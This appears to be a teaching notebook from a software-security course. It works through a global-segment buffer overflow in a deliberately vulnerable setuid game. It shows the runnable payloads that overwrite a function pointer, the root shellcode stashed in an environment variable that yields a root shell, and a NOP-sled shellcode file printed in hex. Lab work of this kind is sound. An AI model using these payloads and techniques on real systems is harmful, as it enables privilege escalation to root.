# Global Segment Overflow

## External Resources
- YouTube Video - [https://youtu.be/CJCuwa45HBk](https://youtu.be/CJCuwa45HBk)
- YouTube Podcast - [https://youtu.be/1Q6qxFS296c](https://youtu.be/1Q6qxFS296c)
- NotebookLM learning materials - [https://notebooklm.google.com/notebook/5569ccaf-d8ac-4809-8a2f-84ca91d8ee3e](https://notebooklm.google.com/notebook/5569ccaf-d8ac-4809-8a2f-84ca91d8ee3e)

## Overview
- buffer overflow can happen in other segments such as **global/data** and **bss**
- if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered (regardless of the memory segment)
    - controls may be limited depending on the variable type and its usage in the program
- in this notebook, we will explore overwriting function pointers located in global segment
- recall function pointers are pointers that store addresses of functions/code
    - see [Function-Pointers notebook](./Function-Pointers.ipynb) for a review
- function pointers can be overwritten using overflow techniques to point to different code/function


## Lucky 7 game
- various luck-based games that're favored to the house
- program uses a function pointer to remember the last game played by the user
- the last game function's address is stored in the **User** structure
- player object is declared as an uninitialized global variable
    - meaning the memory is allocated in the **bss** segment
- seteuid multi-user program that stores player's data in /var folder
- only root or sudo user can access players' info stored in /var folder
- each player is identified by the system's user id
- examine and compile and run game programs in demos/other_overflow/ folder
- game is divided into one header file and 2 .cpp files
- use the provided Makefile found in the same folder; uses C++17 specific features such as system specific file permission
- NOTE: program must be setuid, to read/write the database file: `/var/lucky7.txt`

In [1]:
! cat demos/other_overflow/main.cpp

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <time.h>
#include <stdlib.h>
#include <unistd.h> //getuid()
#include <sys/types.h> // getuid()
#include <iostream>
#include "lucky7.h"

char DATAFILE[] = "/var/lucky7.txt"; // File to store players data

using namespace std;

// Global variables
User player;      // Player struct

int main(int argc, char* argv[]) {
   int choice, last_game = 0;
   // gives same addresses as in GDB
   //printf("player.name @ %p\n", &player.name); 
   //printf("player.current_game @ %p\n", &player.current_game);
   //last_game = 0;
   if(not read_player_data(DATAFILE,  player)) // Try to read player data from file.
      register_new_player(DATAFILE, player);    // If there is no data, register a new player.

   do {
      choice = get_choice(player);

      if (choice < 4) {
         if (choice != last_game) {
            switch(choice) {
               case 1:
                  cout << "\n~*~*~ Lucky 7 ~*~*~\nCosts

In [2]:
! cat demos/other_overflow/lucky7.cpp

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <time.h>
#include <stdlib.h>
#include <unistd.h> //getuid()
#include <sys/types.h> // getuid()
#include <iostream>
#include <fstream>
#include <iomanip>
#include <filesystem> // file system specific permission

#include "lucky7.h"

using namespace std;
namespace fs = std::filesystem;

int get_choice(User &player) {
   int choice = 0;
   //do{
      //system("clear");
      cout << "-=[ Lucky 7 Game Menu ]=-\n";
      cout << "1 - Play Lucky 7 game\n";
      cout << "2 - Play Lucky 777 game\n";
      cout << "3 - Play Lucky 77777 game\n";
      cout << "4 - View your total credits\n";
      cout << "5 - Change your user name\n";
      cout << "6 - Reset your account at 500 credits\n";
      cout << "7 - Quit\n";
      printf("[Name: %s]\n", player.name);
      printf("[You have %u credits] ->  ", player.credits);
      cout << "Enter your choice [1-7]: ";
      cin >> choice;
    
      if ((choice 

- change current working directory to other_overflow folder where the program and Makefile are
- compile using the Makefile

In [3]:
%cd ./demos/other_overflow

/home/kali/projects/SoftwareSecurity/demos/other_overflow


In [4]:
! echo kali | sudo -S make

[sudo] password for kali: g++ -g -Wall -m32 -std=c++17 -fno-stack-protector -z execstack -no-pie lucky7.cpp main.cpp  -o lucky7.exe 
# must run make with sudo to disable randomaize_va_space
echo 0 | tee /proc/sys/kernel/randomize_va_space
0
sudo chown root:root lucky7.exe 
sudo chmod +s lucky7.exe  


In [5]:
# program uses /var/lucky7.txt to store player's information
# let's take a look into it if it exists.
# if the file doesn't exists, run the program to create one
! echo kali | sudo -S cat /var/lucky7.txt
# userid     credits    palaer's_full_name

[sudo] password for kali: cat: /var/lucky7.txt: No such file or directory


In [10]:
# if file exists, delete it to start fresh
! echo kali | sudo -S rm /var/lucky7.txt

[sudo] password for kali: 

In [6]:
! ls -al /var/lucky7.txt

ls: cannot access '/var/lucky7.txt': No such file or directory


In [7]:
! ls -l lucky7.exe

-rwsr-sr-x 1 root root 261468 May  3 16:37 lucky7.exe


### play the interactive game
- lucky is an interactive program that doesn't work with Jupyter Notebook as of Aug. 2021
- Use Terminal to play the program; follow the menu provided by the program to play the game
- press `CTRL-Z` to temporarily suspend (put it in background) the current process
- enter `fg` command to bring the suspended program to fore ground

```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ ./lucky7.exe                                                                                                                                                                      
Database file doesn't exist: /var/lucky7.txt
-=-={ New Player Registration }=-=-
Enter your name: John Smith
                                                                                                                             
Welcome to the Lucky 7 Game John Smith.                                                                                      
You have been given 500 credits.
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith]
[You have 500 credits] ->  Enter your choice [1-7]: 2

~*~*~ Lucky 777 ~*~*~
Costs 50 credits to play this game.
Machine will generate 3 random numbers each between 1 and 9.
If all 3 numbers are 7, you win a jackpot of 100 THOUSAND
If all 3 numbers match, you win 10 THOUSAND
Otherwise, you lose.
 Enter to continue...

[DEBUG] current_game pointer 0x0804b1cd
3 random numers are: 4 3 4 
Sorry! Better luck next time...

You have 450 credits
Would you like to play again? [y/n]:
```

### Find the vulnerability in the game
- do code review to find global **player** object and `change_username()`
- note **user** struct has declared name buffer of 100 bytes
- change_username() function uses `mgets()` function to read and store data into name field one character at a time until '\n'
- there's nothing to limit it to the length of the destination buffer!
- so, the game has buffer overrun/overflow vulnerability!

### Exploit the overflow vulnerability
- run the program
- explore the memory addresses of **name** and **current_game** using peda/gdb
- use gdb to debug the live process
- find the process id of lucky7.exe process

```bash
┌──(kali㉿K)-[~]
└─$ ps aux | grep lucky7.exe                          
root       30439  0.1  0.0   5476  1344 pts/2    S+   10:54   0:00 ./lucky7.exe
kali       30801  0.0  0.0   6320   724 pts/3    S+   10:59   0:00 grep --color=auto lucky7.exe


- use the process_id to debug in gdb

┌──(kali㉿K)-[~/EthicalHacking/demos/other_overflow]
└─$ sudo gdb -q --pid=59004 --symbols=./lucky7.exe

(gdb) p/x &player.name
$1 = 0x8050148

(gdb) p/x &player.current_game
$2 = 0x80501ac

(gdb) p/u 0x80501ac - 0x8050148 # (address of player.current_game) - (address of player.name)
$3 = 100
```

- notice, **name[100]** is at a lower address
- **(\*current_game)()** is at a higher address find the exact size that would overlfow the current_game
- the offset should be at least 100 bytes

### Let's overwrite the current_game's value with our controlled address

- create a string with 100As + BBBB
- detach the process from gdb and change the name with menu option 5 pasting the following buffer
- Enter 1 to play the game and the buffer should overwrite the [DEBUG] current_game pointer with 0x42424242

In [11]:
# change the name to the following string
! python -c 'print("A"*100 + "B"*4)'

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB


- run the program and play the last game after changing name

```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ ./lucky7.exe           
Database file doesn't exist: /var/lucky7.txt
-=-={ New Player Registration }=-=-
Enter your name: John Smith

Welcome to the Lucky 7 Game John Smith.
You have been given 500 credits.
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith]
[You have 500 credits] ->  Enter your choice [1-7]: 1

~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.


[DEBUG] current_game pointer 0x0804b141
the random number is: 8 
Sorry! Better luck next time...

You have 490 credits
Would you like to play again? [y/n]: n
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith]
[You have 490 credits] ->  Enter your choice [1-7]: 5

Change user name
Enter your new name:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Your name has been changed.

-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]
[You have 490 credits] ->  Enter your choice [1-7]: 1

[DEBUG] current_game pointer 0x42424242
zsh: segmentation fault  ./lucky7.exe
```

### Find useful functions/code in the program to execute
- **nm** command lists symbols in object files with corresponding addresses
    - can be used to find addresses of various functions in a program
- `jackpot()` functions are intruiging!

```bash
┌──(kali㉿K)-[~/EthicalHacking/demos/other_overflow]
└─$ nm ./lucky7.exe                                                                                              
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ nm ./lucky7.exe                                                                                                     139 ⨯
08050114 B __bss_start
08050120 b completed.0
         U __cxa_atexit@GLIBC_2.1.3
08050104 D DATAFILE
080500f8 D __data_start
080500f8 W data_start
0804a440 t deregister_tm_clones
0804a420 T _dl_relocate_static_pie
0804a4c0 t __do_global_dtors_aux
0804fee4 d __do_global_dtors_aux_fini_array_entry
080500fc D __dso_handle
08050100 V DW.ref.__gxx_personality_v0
0804fee8 d _DYNAMIC
08050114 D _edata
080501b4 B _end
         U exit@GLIBC_2.0
0804c3d8 T _fini
0804d000 R _fp_hw
0804a4f0 t frame_dummy
0804fed8 d __frame_dummy_init_array_entry
0804e438 r __FRAME_END__
         U getchar@GLIBC_2.0
         U getuid@GLIBC_2.0
08050000 d _GLOBAL_OFFSET_TABLE_
0804c34a t _GLOBAL__sub_I_DATAFILE
0804b5a0 t _GLOBAL__sub_I__Z10get_choiceR4User
         w __gmon_start__
0804d7e4 r __GNU_EH_FRAME_HDR
         U __gxx_personality_v0@CXXABI_1.3
0804a000 T _init
0804fee4 d __init_array_end
0804fed8 d __init_array_start
0804d004 R _IO_stdin_used
0804c3d0 T __libc_csu_fini
0804c370 T __libc_csu_init
         U __libc_start_main@GLIBC_2.0
0804bcda T main
08050140 B player
         U printf@GLIBC_2.0
         U puts@GLIBC_2.0
         U rand@GLIBC_2.0
0804a480 t register_tm_clones
         U sleep@GLIBC_2.0
         U srand@GLIBC_2.0
0804a3e0 T _start
         U strcpy@GLIBC_2.0
         U strlen@GLIBC_2.0
         U time@GLIBC_2.0
08050114 D __TMC_END__
         U _Unwind_Resume@GCC_3.0
0804bcd2 T __x86.get_pc_thunk.ax
0804c3d1 T __x86.get_pc_thunk.bp
0804a430 T __x86.get_pc_thunk.bx
0804bcd6 T __x86.get_pc_thunk.si
0804a4f2 T _Z10get_choiceR4User
0804bfeb T _Z10jackpot10Kv !!!!!!!!!<- JACKPOT ---> !!!!!!!!!!
0804b2b8 T _Z10lucky77777v
0804c038 T _Z11jackpot100Kv
0804b042 T _Z11printNumberi
0804b3fb T _Z12reset_creditPcR4User
0804aeeb T _Z12show_creditsRK4User
0804c181 T _Z13play_the_gamev
0804c0d2 T _Z14deduct_creditsv
0804c29c T _Z15change_usernamev
0804ac37 T _Z16read_player_dataPcR4User
0804b429 T _Z17get_random_numberi
0804a97f T _Z18update_player_dataPcR4User
0804a6c0 T _Z19register_new_playerPcR4User
0804b547 t _Z41__static_initialization_and_destruction_0ii
0804c2f1 t _Z41__static_initialization_and_destruction_0ii
0804ae82 T _Z5mgetsPc
0804b141 T _Z6lucky7v
0804b46d T _Z6rstripRNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE
0804b1cd T _Z8lucky777v
0804c085 T _Z9jackpot1Mv
0804b7fc W _ZN9__gnu_cxx11char_traitsIcE2eqERKcS3_
0804b81c W _ZN9__gnu_cxx11char_traitsIcE6lengthEPKc
...

```

### Script the interactive user input
- instead of typing options and commands interactively, they can be scripted and piped into the program
- program can then parse and use the input as if someone is interactively typing it from the std input stream
- make sure the game has been played atleast once by the current user
    - the following script needs to start with full name otherwise!

In [8]:
# play game #1, y, n; 
# Enter 7 to quit
! python -c 'print("1\ny\nn\n7")'

1
y
n
7


In [10]:
%pwd

'/home/kali/projects/SoftwareSecurity/demos/other_overflow'

In [11]:
! python -c 'print("1\ny\nn\n7")' | ./lucky7.exe

-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: 1                                                                                                   ]
[You have 59930 credits] ->  Enter your choice [1-7]: 
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random number between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND.
Otherwise, you lose.


[DEBUG] current_game pointer 0x0804b07c
the random number is: 1 
Sorry! Better luck next time...

You have 59920 credits
Would you like to play again? [y/n]: 
[DEBUG] current_game pointer 0x0804b07c
the random number is: 6 
Sorry! Better luck next time...

You have 59910 credits
Would you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Ch

In [12]:
# let's replace the current_game with our own data (BBBB)
! python -c 'print("1\nn\n5\n" + "A"*100 + "BBBB\n" + "1\nn\n7")' | ./lucky7.exe

-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: 1                                                                                                   ]
[You have 59910 credits] ->  Enter your choice [1-7]: 
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random number between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND.
Otherwise, you lose.


[DEBUG] current_game pointer 0x0804b07c
the random number is: 4 
Sorry! Better luck next time...

You have 59900 credits
Would you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: 1                                                                                    

In [13]:
# note the jackpot()'s address
! nm ./lucky7.exe | grep jackpot

0804beab T _Z10jackpot10Kv
0804bef8 T _Z11jackpot100Kv
0804bf45 T _Z9jackpot1Mv


In [14]:
# let's create a string mimicking game play with jackpot100K address!
! python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n" + b"A"*100 + b"\xf8\xbe\x04\x08\n" + b"1\nn\n7\n")'
# the following is the sequnce of user input to play the game

1
n
5
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��
1
n
7


In [12]:
# now let's hit the Jackpot to receive 100K credit!
! python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n" + b"A"*100 + b"\xb8\xbf\x04\x08\n" + b"1\nn\n7\n")' | ./lucky7.exe

-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
[You have 109280 credits] ->  Enter your choice [1-7]: 
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.


[DEBUG] current_game pointer 0x0804b0c1
the random number is: 5 
Sorry! Better luck next time...

You have 109270 credits
Would you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

In [13]:
# let's hit the Jackpot 2 times in a row!
# and change to your actual name
# now let's hit the Jackpot!
! python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n" + b"A"*100 + b"\xb8\xbf\x04\x08\n" + b"1\ny\nn\n5\nJohn Smith\n2\nn\n7\n")' | ./lucky7.exe

-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith                                                                                          ]
[You have 609200 credits] ->  Enter your choice [1-7]: 
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.


[DEBUG] current_game pointer 0x0804b0c1
the random number is: 9 
Sorry! Better luck next time...

You have 609190 credits
Would you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith                                                                    

## Exploiting with shellcode

### Stashing Shellcode as Environment Varaible
- compile `getenvaddr.cpp` file as 32-bit binary

In [15]:
! g++ -m32 -o getenvaddr.exe getenvaddr.cpp

- export `/shellcode/shellcode_root.bin` as an env variable

```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ export SHELLCODE=$(cat ../../shellcode/shellcode_root.bin)

┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ ./getenvaddr.exe SHELLCODE ./lucky7.exe                                                                                
SHELLCODE will be at 0xffffdf80 with reference to ./lucky7.exe

┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n" + b"A"*100 + b"\x80\xdf\xff\xff\n" + b"1\n")' > env_exploit

┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ cat env_exploit - | ./lucky7.exe                                                                             
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
[You have 858770 credits] ->  Enter your choice [1-7]: 
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.


[DEBUG] current_game pointer 0x0804b0bf
the random number is: 4 
Sorry! Better luck next time...

You have 858760 credits
Would you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�]
[You have 858760 credits] ->  Enter your choice [1-7]: 
Change user name
Enter your new name:
Your name has been changed.

-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����]
[You have 858760 credits] ->  Enter your choice [1-7]: 
[DEBUG] current_game pointer 0xffffdf80
whoami
root
exit

```

- congratulations on getting your shellcode executed!!

### Smuggling Shellcode into Program's Buffer
### Note: not working!!!

- as the program is setuid; it "should" give you a root shell if you can manage to smuggle and execute root shellcode!
- goal is to overwrite `player.name` with shellcode
- overflow the `player.current_game` attribute with the address of the smuggled shellcode
    - NOTE: we're not overflowing the return address, though you could!
- find the address of `player.name` attribute using gdb
- run `lucky7.exe` game from a terminal
- from another terminal finds its pid

```bash
# Terminal 1
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ ./lucky7.exe 
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith                                                                                          ]
[You have 809140 credits] ->  Enter your choice [1-7]: 

#Terminal 2

┌──(kali㉿K)-[~]
└─$ ps aux | grep lucky7.exe
root        2639  0.0  0.0   5476  1264 pts/2    S+   15:01   0:00 ./lucky7.exe
kali        2932  0.0  0.0   6320   660 pts/3    S+   15:01   0:00 grep --color=auto lucky7.exe


┌──(kali㉿K)-[~]
└─$ sudo gdb -q --pid=2639
[sudo] password for kali: 
Attaching to process 2639
Reading symbols from /home/kali/projects/EthicalHacking/demos/other_overflow/lucky7.exe...
Reading symbols from /lib32/libstdc++.so.6...
(No debugging symbols found in /lib32/libstdc++.so.6)
Reading symbols from /lib32/libgcc_s.so.1...
(No debugging symbols found in /lib32/libgcc_s.so.1)
Reading symbols from /lib32/libc.so.6...
(No debugging symbols found in /lib32/libc.so.6)
Reading symbols from /lib32/libm.so.6...
(No debugging symbols found in /lib32/libm.so.6)
Reading symbols from /lib/ld-linux.so.2...
(No debugging symbols found in /lib/ld-linux.so.2)
0xf7fcb559 in __kernel_vsyscall ()
warning: File "/home/kali/.gdbinit" auto-loading has been declined by your `auto-load safe-path' set to "$debugdir:$datadir/auto-load".
To enable execution of this file add
        add-auto-load-safe-path /home/kali/.gdbinit
line to your configuration file "/root/.gdbinit".
To completely disable this security protection add
        set auto-load safe-path /
line to your configuration file "/root/.gdbinit".
For more information about this security protection see the
"Auto-loading safe path" section in the GDB manual.  E.g., run from the shell:
        info "(gdb)Auto-loading safe path"
(gdb) p/x &player.name
$1 = 0x8050128
(gdb) p/x &player.current_game
$2 = 0x805018c
(gdb) p/u 0x805018c - 0x8050128
$3 = 100
(gdb)
(gdb) quit


```
- so the address of `player.name` is 0x8050128
- the offset to overwrite `player.current_game` from `player.name` is 100!
- exploit code should look like this: [NOP sled | shellcode | SHELLCODE_ADDRESS]
- NOP sled + shellcode should be 100 bytes long
- let's find the length of the root shellcode in `shellcode` folder


In [1]:
%pwd

'/home/kali/projects/EthicalHacking'

In [2]:
%cd ./demos/other_overflow

/home/kali/projects/EthicalHacking/demos/other_overflow


In [3]:
! wc -c ../../shellcode/shellcode_root.bin

35 ../../shellcode/shellcode_root.bin


In [4]:
# total NOP sled
100 - 35

65

In [9]:
# let's write NOP sled to a binary file
! python -c 'import sys; sys.stdout.buffer.write(b"\x90"*65)' > ./lucky7_exploit.bin

In [10]:
! wc -c ./lucky7_exploit.bin

65 ./lucky7_exploit.bin


In [11]:
# lets append shellcode to the exploitcode
! cat ../../shellcode/shellcode_root.bin >> ./lucky7_exploit.bin

In [12]:
# let's check the size of exploit code
! wc -c ./lucky7_exploit.bin

100 ./lucky7_exploit.bin


In [15]:
print(hex(0x08050128 + 25))

0x8050141


In [16]:
# let's append the address of player.name: 0x8050128
! python -c 'import sys; sys.stdout.buffer.write(b"\x41\x01\x05\x08\n")' >> ./lucky7_exploit.bin

In [17]:
! hexdump -C ./lucky7_exploit.bin

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000040  90 31 c0 31 db 31 c9 99  b0 a4 cd 80 6a 0b 58 51  |.1.1.1......j.XQ|
00000050  68 2f 2f 73 68 68 2f 62  69 6e 89 e3 51 89 e2 53  |h//shh/bin..Q..S|
00000060  89 e1 cd 80 41 01 05 08  0a                       |....A....|
00000069


In [18]:
# let's check the size of exploit code
! wc -c ./lucky7_exploit.bin

105 ./lucky7_exploit.bin


In [22]:
! python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n")' > lucky7_final_exploit.bin

In [24]:
! hexdump -C lucky7_final_exploit.bin

00000000  31 0a 6e 0a 35 0a                                 |1.n.5.|
00000006


In [25]:
! cat lucky7_exploit.bin >> lucky7_final_exploit.bin

In [26]:
! python -c 'import sys; sys.stdout.buffer.write(b"1\n")' >> lucky7_final_exploit.bin

In [27]:
! wc -c ./exploit_game.bin

116 ./exploit_game.bin


In [28]:
! hexdump -C ./lucky7_final_exploit.bin

00000000  31 0a 6e 0a 35 0a 90 90  90 90 90 90 90 90 90 90  |1.n.5...........|
00000010  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000040  90 90 90 90 90 90 90 31  c0 31 db 31 c9 99 b0 a4  |.......1.1.1....|
00000050  cd 80 6a 0b 58 51 68 2f  2f 73 68 68 2f 62 69 6e  |..j.XQh//shh/bin|
00000060  89 e3 51 89 e2 53 89 e1  cd 80 41 01 05 08 0a 31  |..Q..S....A....1|
00000070  0a                                                |.|
00000071


- exploit the program with the final exploit created

``` 
$ cat lucky7_final_exploit.bin - | ./lucky7.exe
```

- NOTICE: the hyphen after the exploit
- tells the cat program to send standard input after the exploit buffer, returning control of the input
- eventhough the shell doesn't display its prompt, it is still accessible
- stash both and user and root shell and force the program execute them

```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ cat lucky7_final_exploit.bin - | ./lucky7.exe    
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: ��������������������������������������������������������1����$h/zsh/binh/usr                      ]
[You have 918420 credits] ->  Enter your choice [1-7]: 
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.


[DEBUG] current_game pointer 0x0804b0bf
the random number is: 7 
*+*+*+*+*+* JACKPOT 10 THOUSAND *+*+*+*+*+*
Congratulations!
 You have won the jackpot of 10000 (10K) credits!

You have 928410 credits
Would you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: ��������������������������������������������������������1����$h/zsh/binh/usr                      �]
[You have 928410 credits] ->  Enter your choice [1-7]: 
Change user name
Enter your new name:
Your name has been changed.

-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: �����������������������������������������������������������������1�1�1ə��j
                                                                                 XQh//shh/bin��Q��S��]
[You have 928410 credits] ->  Enter your choice [1-7]: 
[DEBUG] current_game pointer 0x08050141
ls
zsh: broken pipe         cat lucky7_final_exploit.bin - | 
zsh: segmentation fault  ./lucky7.exe

```


## Exercise
- smuggle the shellcode into the name field, find it's address and exploit the program.
- smuggle both user and root shells